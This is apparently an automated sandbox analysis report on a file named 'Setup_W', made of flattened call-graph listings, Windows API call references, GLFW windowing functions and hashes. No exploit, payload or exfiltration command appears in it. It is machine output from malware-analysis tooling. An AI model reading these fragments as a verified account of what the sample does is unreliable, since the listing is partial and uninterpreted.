7126->7109 7127->7116 7129 64609d30 7128->7129 7132 64609b95 7128->7132 7130 646090cb 5 API calls 7129->7130 7133 64609c0b 7129->7133 7130->7133 7131 646090cb 5 API calls 7131->7133 7132->7131 7132->7133 7133->7045 8074 64604326 8075 64604334 8074->8075 8076 64604394 8075->8076 8077 64604378 8075->8077 8079 646043b5 8076->8079 8080 64604399 8076->8080 8078 64602ef4 6 API calls 8077->8078 8081 6460438f 8078->8081 8079->8081 8083 64609b7b 5 API calls 8079->8083 8082 64602ef4 6 API calls 8080->8082 8082->8081 8083->8081 8084 64610b26 8085 64610b30 8084->8085 8086 646107e0 11 API calls 8085->8086 8087 64610aa0 8085->8087 8089 64610935 8085->8089 8086->8085 8088 64610ad2 VirtualProtect 8087->8088 8087->8089 8088->8087 8090 6460cd2b IsIconic 8091 64611f30 wcstombs 8092 64611f62 malloc wcstombs 8091->8092 8093 64611f87 wcstombs 8091->8093 8092->8093 8094 64611fa6 malloc wcstombs 8093->8094 8095 64611fcb _assert free 8093->8095 8094->8095 8105 64604938 8106 64604947 8105->8106 8107 6460495b 8105->8107 8108 64602ef4 6 API calls 8106->8108 8108->8107 8109 6460bd39 8110 6460be3c GetClassLongW GetClassLongW 8109->8110 8111 6460bd4f GetSystemMetrics GetSystemMetrics 8109->8111 8112 6460be3a 8110->8112 8117 6460bd89 8111->8117 8113 6460bed4 8112->8113 8114 6460beca DestroyIcon 8112->8114 8115 6460bee8 8113->8115 8116 6460bede DestroyIcon 8113->8116 8114->8113 8116->8115 8118 6460b26a 17 API calls 8117->8118 8119 6460be25 8118->8119 8120 6460b26a 17 API calls 8119->8120 8120->8112 8121 6460f93a 8122 6460f948 8121->8122 8123 6460f984 8122->8123 8124 6460f96e 8122->8124 8126 6460f982 8123->8126 8128 6460c46e ShowWindow 8123->8128 8125 64602ef4 6 API calls 8124->8125 8125->8126 8128->8126 8137 6460bf02 ClientToScreen 8138 6460bf3d 8137->8138 8139 64601906 8140 64601914 8139->8140 8141 6460196e 8140->8141 8142 64602ef4 6 API calls 8140->8142 8143 64601968 8142->8143 8144 64610d07 8145 64610ce8 free 8144->8145 8147 64610cf0 LeaveCriticalSection 8145->8147 8148 64611508 8149 64611510 8148->8149 8150 64611c20 _errno 8149->8150 8151 6461153a 8150->8151 8152 64611428 8151->8152 8153 64611950 _errno 8151->8153 8153->8152 8154 64610308 8155 64610311 8154->8155 8156 6461032d 8154->8156 8157 64602ef4 6 API calls 8155->8157 8156->8156 8158 6461032b 8157->8158 8169 64611316 8171 64611320 8169->8171 8170 6461137a 8171->8170 8172 64611c20 _errno 8171->8172 8172->8170 8173 64609118 8174 64609144 memcmp 8173->8174 8176 646092b9 8173->8176 8175 64609174 memcmp 8174->8175 8177 64609163 8174->8177 8175->8177 8178 6460919b memcmp 8175->8178 8177->8176 8182 6460929d memcmp 8177->8182 8178->8177 8179 646091c2 memcmp 8178->8179 8179->8177 8180 646091e6 memcmp 8179->8180 8180->8177 8181 6460920a memcmp 8180->8181 8181->8177 8183 6460922e memcmp 8181->8183 8182->8176 8183->8176 8183->8177 8184 6460eb1c 8185 6460eb2e 8184->8185 8186 6460eb85 strncpy 8185->8186 8188 6460ebc9 8185->8188 8189 6460ebe1 8186->8189 8190 64602ef4 6 API calls 8188->8190 8190->8189 8191 64606de0 8192 64606dee 8191->8192 8193 64606e32 8192->8193 8194 64606e1a 8192->8194 8196 64606bcb 14 API calls 8193->8196 8195 64602ef4 6 API calls 8194->8195 8197 64606e2e 8195->8197 8196->8197 6714 6460ebe8 6715 6460ebfc 6714->6715 6717 6460ec12 6714->6717 6716 64602ef4 6 API calls 6715->6716 6718 6460ec10 6716->6718 6719 6460ad78 TlsGetValue 6717->6719 6724 6460ec4b 6717->6724 6718->6724 6720 6460ec33 6719->6720 6721 6460ec43 6720->6721 6722 6460ec37 glfwMakeContextCurrent 6720->6722 6725 6460bc57 6721->6725 6722->6721 6726 6460bc67 6725->6726 6728 6460bc6e 6725->6728 6735 6460b80c 6726->6735 6729 6460bcc6 6728->6729 6730 6460bc99 RemovePropW DestroyWindow 6728->6730 6731 6460bcd0 DestroyIcon 6729->6731 6732 6460bcda 6729->6732 6730->6729 6731->6732 6733 6460bce4 DestroyIcon 6732->6733 6734 6460bcee 6732->6734 6733->6734 6734->6724 6736 6460b89a 6735->6736 6737 6460b81d 6735->6737 6736->6728 6738 6460b825 SetThreadExecutionState 6737->6738 6741 6460b87c 6737->6741 6744 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6738->6744 6740 6460b84f 6740->6741 6742 6460b853 SystemParametersInfoW 6740->6742 6745 6460a572 6741->6745 6742->6741 6744->6740 6746 6460a585 ChangeDisplaySettingsExW 6745->6746 6747 6460a5be 6745->6747 6746->6747 6747->6736 8202 6460dbec 8203 6460dbf4 8202->8203 8204 6460deb9 DefWindowProcW 8203->8204 8205 646105ec 8206 646105f0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess abort 8205->8206 8207 6461068c 8206->8207 8208 64610690 8207->8208 8209 64610d20 7 API calls 8207->8209 8210 646106b8 8209->8210 8211 646053ed 8212 646053f6 OpenClipboard 8211->8212 8213 646053fb 8211->8213 8216 6460e3e5 8212->8216 8217 6460e3fb GetClipboardData 8212->8217 8215 64602ef4 6 API calls 8213->8215 8218 64605415 8215->8218 8219 64608298 9 API calls 8216->8219 8220 6460e415 8217->8220 8221 6460e42d GlobalLock 8217->8221 8225 6460e3f9 8219->8225 8222 64608298 9 API calls 8220->8222 8223 6460e457 free 8221->8223 8224 6460e43d 8221->8224 8226 6460e429 CloseClipboard 8222->8226 8231 6460844c WideCharToMultiByte 8223->8231 8227 64608298 9 API calls 8224->8227 8226->8225 8229 6460e451 CloseClipboard 8227->8229 8229->8225 8232 646084a2 8231->8232 8233 646084b8 calloc WideCharToMultiByte 8231->8233 8234 64608298 9 API calls 8232->8234 8235 646084b6 GlobalUnlock CloseClipboard 8233->8235 8236 6460850b 8233->8236 8234->8235 8235->8225 8237 64608298 9 API calls 8236->8237 8238 6460851f free 8237->8238 8238->8235 8252 646037f0 8253 64603802 8252->8253 8254 64603844 8253->8254 8255 64603828 8253->8255 8257 64602ef4 6 API calls 8254->8257 8258 6460383f 8254->8258 8256 64602ef4 6 API calls 8255->8256 8256->8258 8257->8258 8259 646105f0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess abort 8260 6461068c 8259->8260 8261 64610690 8260->8261 8262 64610d20 7 API calls 8260->8262 8263 646106b8 8262->8263 8264 646063f1 8265 64606405 8264->8265 8266 646064bc 8264->8266 8268 6460643b free calloc 8265->8268 8269 64606470 8265->8269 8267 6460adb6 TlsSetValue 8266->8267 8272 646064ba 8267->8272 8268->8269 8269->8266 8270 646064a6 8269->8270 8271 64602ef4 6 API calls 8270->8271 8271->8272 8273 6460cdf2 SetWindowPos 8274 64611ff3 8275 64612000 GetModuleHandleW GetProcAddress 8274->8275 8276 64601ff4 8277 64602008 FreeLibrary 8276->8277 8278 6460201c 8276->8278 8277->8278 8279 64605ff9 8280 64606008 8279->8280 8281 64606046 8280->8281 8282 6460602e 8280->8282 8288 64605737 free free free 8281->8288 8283 64602ef4 6 API calls 8282->8283 8285 64606044 8283->8285 8286 64606051 8287 6460ab26 6 API calls 8286->8287 8287->8285 8288->8286 8289 646011fb 8290 64601200 _amsg_exit 8289->8290 8291 64603dff 8292 64603e11 8291->8292 8293 6460b4a7 6 API calls 8292->8293 8294 6460e287 8293->8294 8299 646061c2 8301 646061d8 8299->8301 8300 64606287 8302 64602ef4 6 API calls 8300->8302 8301->8300 8303 646062af glfwGetGammaRamp 8301->8303 8304 646062aa 8302->8304 8303->8304 8305 646062c1 calloc 8303->8305 8308 646062d8 8305->8308 8306 6460634f glfwSetGammaRamp 8306->8304 8308->8306 8309 64611210 8308->8309 8310 64611240 8309->8310 8317 6461137a 8309->8317 8311 646113d0 8310->8311 8314 64611279 8310->8314 8310->8317 8312 646115c0 _errno 8311->8312 8313 646113db _errno 8311->8313 8316 646115fb 8312->8316 8313->8317 8315 64611285 8314->8315 8320 64611490 8314->8320 8318 6461129c 8315->8318 8323 64611430 8315->8323 8324 646116d0 8315->8324 8316->8308 8317->8308 8319 64611680 8318->8319 8322 646112e6 8318->8322 8327 646116a2 8319->8327 8328 64611302 8319->8328 8320->8317 8321 64611c20 _errno 8320->8321 8320->8323 8321->8323 8322->8323 8326 64611950 _errno 8322->8326 8322->8328 8323->8317 8323->8326 8324->8317 8325 64611c20 _errno 8324->8325 8325->8322 8326->8317 8329 646119d8 8327->8329 8330 64611aa0 _errno 8327->8330 8328->8317 8331 64611c20 _errno 8328->8331 8329->8308 8332 64611aef 8330->8332 8331->8317 8332->8308 8333 6460a5c3 8338 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 8333->8338 8335 6460a5eb 8336 6460a616 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 8335->8336 8337 6460a5ef 8335->8337 8336->8337 8338->8335 8349 646113c8 8350 646113d0 8349->8350 8351 646115c0 _errno 8350->8351 8352 646113db _errno 8350->8352 8354 646115fb 8351->8354 8353 64611416 8352->8353 8368 6460d7cf 8369 6460d7e2 8368->8369 8370 6460deb9 DefWindowProcW 8368->8370 8369->8370 8371 6460d7ef GetRawInputData 8369->8371 8372 6460d850 GetRawInputData 8371->8372 8373 6460d825 free calloc 8371->8373 8374 6460d89b 8372->8374 8375 6460d887 8372->8375 8373->8372 8374->8370 8376 64602ef4 6 API calls 8375->8376 8376->8374 8377 646011d3 8378 646011d8 _initterm 8377->8378 8379 6460110d 8378->8379 8380 646013d9 8381 646013e0 8380->8381 8400 64610530 8381->8400 8383 646013c6 8386 64601220 8383->8386 8385 646013d3 8387 646012a0 8386->8387 8388 64601237 8386->8388 8389 64610920 12 API calls 8387->8389 8396 64601281 8388->8396 8404 64610920 8388->8404 8391 646012a5 8389->8391 8392 64601020 9 API calls 8391->8392 8399 646012f3 8391->8399 8394 646012c1 8392->8394 8393 64601245 8395 64601020 9 API calls 8393->8395 8394->8396 8394->8399 8416 64610510 8394->8416 8395->8396 8396->8385 8398 64601020 9 API calls 8398->8396 8399->8396 8399->8398 8401 64610553 8400->8401 8402 64610568 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 8400->8402 8401->8383 8403 646105bf 8402->8403 8403->8383 8411 64610940 8404->8411 8415 64610935 8404->8415 8405 64610b30 8408 646107e0 11 API calls 8405->8408 8413 64610a9d 8405->8413 8405->8415 8406 64610b82 8407 64610780 11 API calls 8406->8407 8409 64610b92 8407->8409 8408->8405 8410 646107e0 11 API calls 8410->8411 8411->8405 8411->8406 8411->8410 8412 64610780 11 API calls 8411->8412 8411->8413 8411->8415 8412->8411 8414 64610ad2 VirtualProtect 8413->8414 8413->8415 8414->8413 8415->8393 8417 64610519 8416->8417 8418 646104b0 8416->8418 8417->8399 8419 646013f0 5 API calls 8418->8419 8420 646104e0 8419->8420 8420->8399 8421 646019dc 8422 646019ec 8421->8422 8423 64601a31 8422->8423 8424 64601a12 8422->8424 8426 6460ad78 TlsGetValue 8423->8426 8425 64602ef4 6 API calls 8424->8425 8434 64601a29 8425->8434 8427 64601a3d 8426->8427 8428 64601a43 8427->8428 8429 64601abd 8427->8429 8433 64601a76 8427->8433 8430 64602ef4 6 API calls 8428->8430 8429->8428 8431 64601ae7 8429->8431 8430->8434 8432 646017ee 2 API calls 8431->8432 8432->8434 8433->8428 8433->8434 8435 64601aaa strcmp 8433->8435 8435->8433 8435->8434 8436 646071dd 8437 6460726c SwapBuffers 8436->8437 8438 646071ee 8436->8438 8443 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 8438->8443 8440 6460720a 8440->8437 8444 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 8440->8444 8442 6460722a 8442->8437 8443->8440 8444->8442 8468 6460d3de 8469 6460d109 13 API calls 8468->8469 8470 6460d3ec 8469->8470 8471 6460d400 8470->8471 8473 6460c402 ShowWindow 8470->8473 8473->8471 8478 64606da7 8479 64606dd2 8478->8479 8480 64606db6 8478->8480 8482 64606bcb 14 API calls 8479->8482 8481 64602ef4 6 API calls 8480->8481 8483 64606dcd 8481->8483 8482->8483 8497 6460c1a9 8498 6460c1b9 8497->8498 8499 6460c1cb GetWindowRect MoveWindow 8498->8499 8500 6460c21d 8498->8500 8499->8500 8501 6460d3a9 8502 6460d3b9 8501->8502 8503 6460d3c7 8502->8503 8504 6460deb9 DefWindowProcW 8502->8504 8505 6460d3d7 8503->8505 8506 6460d038 11 API calls 8503->8506 8506->8505 8512 646011ab 8513 646011b0 _initterm 8512->8513 8514 646010ff 8513->8514 8515 646011d8 _initterm 8514->8515 8516 6460110d 8514->8516 8515->8516 8517 64606fab 8518 64606fc7 8517->8518 8519 64607052 8518->8519 8520 6460703c 8518->8520 8522 64606bcb 14 API calls 8519->8522 8521 64602ef4 6 API calls 8520->8521 8529 64607050 8521->8529 8523 6460705e 8522->8523 8524 64607086 8523->8524 8525 6460706b 8523->8525 8523->8529 8527 646070aa 8524->8527 8528 6460708f 8524->8528 8526 64602ef4 6 API calls 8525->8526 8526->8529 8531 6460e522 8527->8531 8532 6460e53d GetModuleHandleW 8527->8532 8530 64602ef4 6 API calls 8528->8530 8530->8529 8533 64602ef4 6 API calls 8531->8533 8535 6460e58e 8532->8535 8534 6460e53b 8533->8534 8535->8534 8536 64602ef4 6 API calls 8535->8536 8536->8534 8537 646013b0 8538 646013e0 8537->8538 8539 646013c6 8537->8539 8541 64610530 5 API calls 8538->8541 8540 64601220 26 API calls 8539->8540 8542 646013d3 8540->8542 8541->8539 8543 6460d9b3 8544 6460d9ca 8543->8544 8545 6460b169 4 API calls 8544->8545 8546 6460d9f0 8544->8546 8545->8546 8547 6460da62 8546->8547 8548 6460da69 8546->8548 8551 6460da67 8546->8551 8549 6460b80c 7 API calls 8547->8549 8550 6460b0a6 21 API calls 8548->8550 8549->8551 8552 6460da6e 8550->8552 8554 6460af9b GetMonitorInfoW SetWindowPos 8552->8554 8554->8551 8559 6460cfb5 PostMessageW 8560 646115b7 8561 646115c0 _errno 8560->8561 8562 646115fb 8561->8562 8604 64601186 8605 646010e4 8604->8605 8606 64601200 _amsg_exit 8605->8606 8607 646010f2 8605->8607 8608 646011b0 _initterm 8607->8608 8609 646010ff 8607->8609 8608->8609 8610 646011d8 _initterm 8609->8610 8611 6460110d 8609->8611 8610->8611 8616 6460cd88 8617 6460cdb6 8616->8617 8618 6460cd9a 8616->8618 8620 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 8618->8620 8620->8617 8621 64603f89 8622 64603fb3 8621->8622 8623 64603f9d 8621->8623 8624 64603fd8 calloc 8622->8624 8625 64603fbe 8622->8625 8626 64602ef4 6 API calls 8623->8626 8632 6460e19e 8624->8632 8627 64602ef4 6 API calls 8625->8627 8629 64603fb1 8626->8629 8627->8629 8631 6460400b glfwDestroyCursor 8631->8629 8634 6460e1ae 8632->8634 8633 6460e1ff LoadImageW 8635 6460e242 8633->8635 8636 64604007 8633->8636 8634->8633 8634->8636 8637 64608298 9 API calls 8635->8637 8636->8629 8636->8631 8637->8636 8638 64605b8c 8639 64605ba2 EnumDisplaySettingsExW 8638->8639 8641 6460a6fb 8639->8641 8642 6460318d 8643 646031a0 8642->8643 8644 646031ae 8642->8644 8643->8644 8645 64602ef4 6 API calls 8643->8645 8645->8644 8646 6460d98e 8647 6460d038 11 API calls 8646->8647 8648 6460d9ae DefWindowProcW 8647->8648 8650 6460dd8f DragQueryFileW calloc DragQueryPoint 8652 6460ddf8 8650->8652 8651 6460de77 8654 6460de91 free 8651->8654 8655 6460de9f free DragFinish 8651->8655 8652->8651 8653 6460de22 calloc 8652->8653 8656 6460844c 13 API calls 8652->8656 8653->8652 8654->8651 8657 6460de66 free 8656->8657 8657->8652 8658 64605f92 8659 64605fa0 8658->8659 8660 64605fc6 8659->8660 8661 64605fde 8659->8661 8663 64602ef4 6 API calls 8660->8663 8662 6460a79f EnumDisplaySettingsW 8661->8662 8664 64605fda 8662->8664 8663->8664 8665 64605394 8666 646053a2 8665->8666 8667 6460e316 8666->8667 8668 6460e2e5 GlobalAlloc 8666->8668 8669 6460e302 8668->8669 8670 6460e31b GlobalLock 8668->8670 8673 64608298 9 API calls 8669->8673 8671 6460e333 GlobalUnlock OpenClipboard 8670->8671 8672 6460e329 8670->8672 8671->8672 8676 6460e39b EmptyClipboard SetClipboardData CloseClipboard 8671->8676 8675 64608298 9 API calls 8672->8675 8673->8667 8677 6460e38f GlobalFree 8675->8677 8676->8667 8677->8667 8691 6460639e 8692 646063b2 8691->8692 8693 646063d0 free 8692->8693 8694 646063ec 8692->8694 8693->8694

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 64608848-646088b8 KiUserCallbackDispatcher SystemParametersInfoW 2 646088c7-646088f5 GetProcAddress 0->2 3 646088ba-646088c2 0->3 8 64608904-646089a9 GetProcAddress * 6 LoadLibraryA 2->8 9 646088f7-646088ff 2->9 4 64608eb9-64608ec7 call 64608298 3->4 10 64608f93-64608f9a 4->10 11 646089ab-646089be GetProcAddress 8->11 12 646089bf-646089ce 8->12 9->4 11->12 13 646089d1-646089d5 12->13 14 646089d7-646089ea LoadLibraryA 13->14 15 64608a19-64608a2d LoadLibraryA 13->15 14->13 16 646089ec-64608a18 GetProcAddress * 2 14->16 17 64608a75-64608a89 15->17 18 64608a2f-64608a74 GetProcAddress * 3 15->18 16->15 20 64608ab8-64608acc 17->20 21 64608a8b-64608ab7 GetProcAddress * 2 17->21 18->17 23 64608ae2-64608d88 20->23 24 64608ace-64608ae1 GetProcAddress 20->24 21->20 25 64608d92-64608d9d 23->25 24->23 26 64608da7-64608dad 25->26 27 64608d9f 25->27 26->25 28 64608daf-64608dc2 call 64608533 call 6460877d 26->28 27->26 33 64608dd3-64608df1 call 646086ab 28->33 34 64608dc4-64608dd1 SetProcessDpiAwarenessContext 28->34 39 64608e03-64608e21 call 646086ab 33->39 40 64608df3 33->40 36 64608e00-64608e01 34->36 38 64608e29-64608e30 call 6460bb1b 36->38 38->10 45 64608e36-64608eaf GetModuleHandleW CreateWindowExW 38->45 39->38 46 64608e23 SetProcessDPIAware 39->46 40->36 47 64608eb1 45->47 48 64608ecc-64608f2c ShowWindow RegisterDeviceNotificationW 45->48 46->38 47->4 49 64608f2f-64608f61 PeekMessageW 48->49 50 64608f63-64608f7d TranslateMessage DispatchMessageW 49->50 51 64608f7f-64608f84 call 6460aef0 call 64609b0e 49->51 50->49 55 64608f89-64608f8e call 6460a331 51->55 55->10
                                                                                                APIs
                                                                                                • KiUserCallbackDispatcher.NTDLL ref: 64608876
                                                                                                • SystemParametersInfoW.USER32 ref: 6460889A
                                                                                                • GetProcAddress.KERNEL32 ref: 646088D8
                                                                                                • ShowWindow.USER32 ref: 64608EDC
                                                                                                • RegisterDeviceNotificationW.USER32 ref: 64608F21
                                                                                                • PeekMessageW.USER32 ref: 64608F56
                                                                                                • TranslateMessage.USER32 ref: 64608F69
                                                                                                • DispatchMessageW.USER32(00000000), ref: 64608F76
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$AddressCallbackDeviceDispatchDispatcherInfoNotificationParametersPeekProcRegisterShowSystemTranslateUserWindow
                                                                                                • String ID: $$0cd$0;cd$<;cd
                                                                                                • API String ID: 492125495-2933605525
                                                                                                • Opcode ID: d6ccfd26f1ffe45069021f70fcd627825fc26292ea915f0df43bdb35d03f3396
                                                                                                • Instruction ID: 1631ad54a60ab0754004a945e7f3dbe07b8806c8f3d5c1b253d8a438647a4c41
                                                                                                • Opcode Fuzzy Hash: d6ccfd26f1ffe45069021f70fcd627825fc26292ea915f0df43bdb35d03f3396
                                                                                                • Instruction Fuzzy Hash: 560233B050D380DFDB26DF66C98875ABBF4FB56708F00A81DE4898B650D7B58888CF56

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 58 6460496f-64604980 59 64604982-64604992 58->59 60 6460499f-646049a6 58->60 59->60 61 646049a8-646049c8 call 64602ef4 60->61 62 646049fc-64604a00 60->62 70 64604f66-64604f70 61->70 63 64604a02 62->63 64 646049cd-646049ec strcspn 62->64 68 64604f15 63->68 66 64604a07-64604a10 64->66 67 646049ee-646049f4 64->67 73 64604ef4-64604f0a strspn 66->73 74 64604a16 66->74 71 646049f6 67->71 72 64604a18-64604c36 strcspn 67->72 75 64604f1a-64604f27 68->75 71->62 78 64604c51-64604c58 72->78 79 64604c38-64604c4c call 64602ef4 72->79 73->68 74->67 76 64604f34-64604f3d 75->76 77 64604f29-64604f2e call 6460330d 75->77 76->75 82 64604f3f-64604f44 76->82 77->76 78->79 83 64604c5a-64604c8a strcspn 78->83 82->70 83->79 86 64604c8c-64604c94 83->86 86->79 87 64604c96-64604ca6 86->87 88 64604cac-64604cb6 87->88 89 64604e67-64604e73 88->89 90 64604cbc-64604cc1 88->90 92 64604e75-64604e81 89->92 90->71 91 64604cc7 90->91 93 64604cc9-64604cf8 strlen strncmp 91->93 94 64604e83-64604e86 92->94 95 64604e8c-64604e8f 92->95 96 64604d00-64604d04 93->96 97 64604cfa-64604cfe 93->97 94->95 95->92 98 64604e91-64604eac call 64609f29 call 646032ba 95->98 96->93 100 64604d06 96->100 97->96 99 64604d0b-64604d1e 97->99 113 64604ee6-64604eed 98->113 114 64604eae-64604edf realloc 98->114 103 64604d24-64604d29 99->103 104 64604e0c-64604e26 strncmp 99->104 102 64604e2c-64604e62 strcspn strspn 100->102 102->88 106 64604d3b-64604d43 103->106 107 64604d2b-64604d39 103->107 104->71 104->102 110 64604d45-64604d48 106->110 111 64604d4e 106->111 109 64604d53-64604d5e 107->109 115 64604d60-64604d63 109->115 116 64604d68-64604d6b 109->116 110->111 111->109 113->73 114->113 117 64604f46-64604f61 strtoul 115->117 118 64604d75-64604d78 116->118 119 64604d6d-64604d70 116->119 121 64604dce-64604dd4 117->121 118->102 120 64604d7e-64604dcc strtoul * 2 118->120 119->117 120->121 121->102 122 64604dd6-64604e00 121->122 122->102 123 64604e02-64604e0a 122->123 123->102
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: strcspn$callocstrcpystrlenstrncmpstrspnstrtoul
                                                                                                • String ID: ,$,
                                                                                                • API String ID: 1884079115-220654547
                                                                                                • Opcode ID: 25bc4c535642e7489e7812ab0660e2ad26dbdeeb91398133799e6bb0e79760f3
                                                                                                • Instruction ID: 4e2591ca80fda431e89cdfa17fb7706cfdf5ffbd0de9d582056cb6620bd4d30f
                                                                                                • Opcode Fuzzy Hash: 25bc4c535642e7489e7812ab0660e2ad26dbdeeb91398133799e6bb0e79760f3
                                                                                                • Instruction Fuzzy Hash: 06F14EB0D097698FDB25CF24CE807CABBF5EB66705F0095EAC448A7245E7719A88CF41

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 124 6460c519-6460c543 call 6460b543 call 6460af80 129 6460c545-6460c579 call 6460a6a5 call 6460a79f 124->129 130 6460c57b-6460c594 124->130 136 6460c5c4-6460c5d1 call 64608385 129->136 131 6460c596 130->131 132 6460c59c-6460c5bf call 6460b1d6 130->132 131->132 132->136 141 6460c5d7-6460c664 GetModuleHandleW CreateWindowExW free 136->141 142 6460c67a-6460c67c 136->142 143 6460c681-6460c6b7 SetPropW call 646086ab 141->143 144 6460c666-6460c675 call 64608298 141->144 145 6460c9b2-6460c9b9 142->145 149 6460c737-6460c744 143->149 150 6460c6b9-6460c734 ChangeWindowMessageFilterEx * 3 143->150 144->142 151 6460c74a-6460c778 149->151 152 6460c8ac-6460c8cc DragAcceptFiles 149->152 150->149 153 6460c77a-6460c7b9 call 6460c3c4 151->153 154 6460c7bc-6460c804 call 6460877d 151->154 155 6460c8ce-6460c8d5 call 6460b89f 152->155 156 6460c8df-6460c8e5 152->156 153->154 189 6460c806-6460c847 GetDpiForWindow 154->189 190 6460c849-6460c865 AdjustWindowRectEx 154->190 155->156 159 6460c914-6460c91f 156->159 160 6460c8e7-6460c8eb 156->160 166 6460c921-6460c928 call 6460737c 159->166 167 6460c946-6460c94b 159->167 164 6460c8f1-6460c90f call 6460c46e call 6460c4da call 6460b0a6 call 6460af9b 160->164 165 6460c9ad 160->165 164->165 165->145 166->142 177 6460c92e-6460c944 call 646076e0 166->177 170 6460c972-6460c977 167->170 171 6460c94d-6460c954 call 646021f7 167->171 170->160 176 6460c97d-6460c984 call 646064fa 170->176 171->142 185 6460c95a-6460c970 call 646025a0 171->185 176->142 187 6460c98a-6460c99b call 6460666f 176->187 194 6460c9a0-6460c9a2 177->194 185->194 187->194 197 6460c868-6460c8ab GetWindowPlacement SetWindowPlacement 189->197 190->197 194->160 198 6460c9a8 194->198 197->152 198->142
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32 ref: 6460C5E4
                                                                                                • CreateWindowExW.USER32 ref: 6460C63F
                                                                                                • free.MSVCRT ref: 6460C657
                                                                                                  • Part of subcall function 6460A6A5: EnumDisplaySettingsExW.USER32 ref: 6460A6EE
                                                                                                  • Part of subcall function 6460A79F: EnumDisplaySettingsW.USER32 ref: 6460A7DC
                                                                                                • SetPropW.USER32 ref: 6460C690
                                                                                                  • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460870F
                                                                                                  • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460872B
                                                                                                  • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 64608747
                                                                                                  • Part of subcall function 646086AB: RtlVerifyVersionInfo.NTDLL ref: 64608765
                                                                                                • ChangeWindowMessageFilterEx.USER32 ref: 6460C6DA
                                                                                                • ChangeWindowMessageFilterEx.USER32 ref: 6460C704
                                                                                                • ChangeWindowMessageFilterEx.USER32 ref: 6460C72E
                                                                                                • GetDpiForWindow.USER32(00000000), ref: 6460C81B
                                                                                                • AdjustWindowRectEx.USER32(00000000,00000000), ref: 6460C85F
                                                                                                  • Part of subcall function 6460B89F: CreateRectRgn.GDI32(00000000), ref: 6460B90B
                                                                                                  • Part of subcall function 6460B89F: GetWindowLongW.USER32 ref: 6460B95B
                                                                                                  • Part of subcall function 6460B89F: SetWindowLongW.USER32 ref: 6460B97D
                                                                                                  • Part of subcall function 6460B89F: SetLayeredWindowAttributes.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6460B9A7
                                                                                                  • Part of subcall function 6460B89F: DeleteObject.GDI32 ref: 6460B9B3
                                                                                                • GetWindowPlacement.USER32 ref: 6460C87E
                                                                                                • SetWindowPlacement.USER32 ref: 6460C8A4
                                                                                                • DragAcceptFiles.SHELL32 ref: 6460C8BD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
